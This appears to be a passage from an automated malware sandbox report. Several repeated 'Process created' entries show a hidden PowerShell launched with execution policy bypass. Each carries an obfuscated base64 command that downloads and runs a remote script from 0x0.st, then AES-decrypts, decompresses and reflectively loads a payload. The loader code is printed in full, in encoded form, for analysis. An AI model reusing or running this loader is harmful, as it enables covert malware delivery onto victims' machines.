W5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaX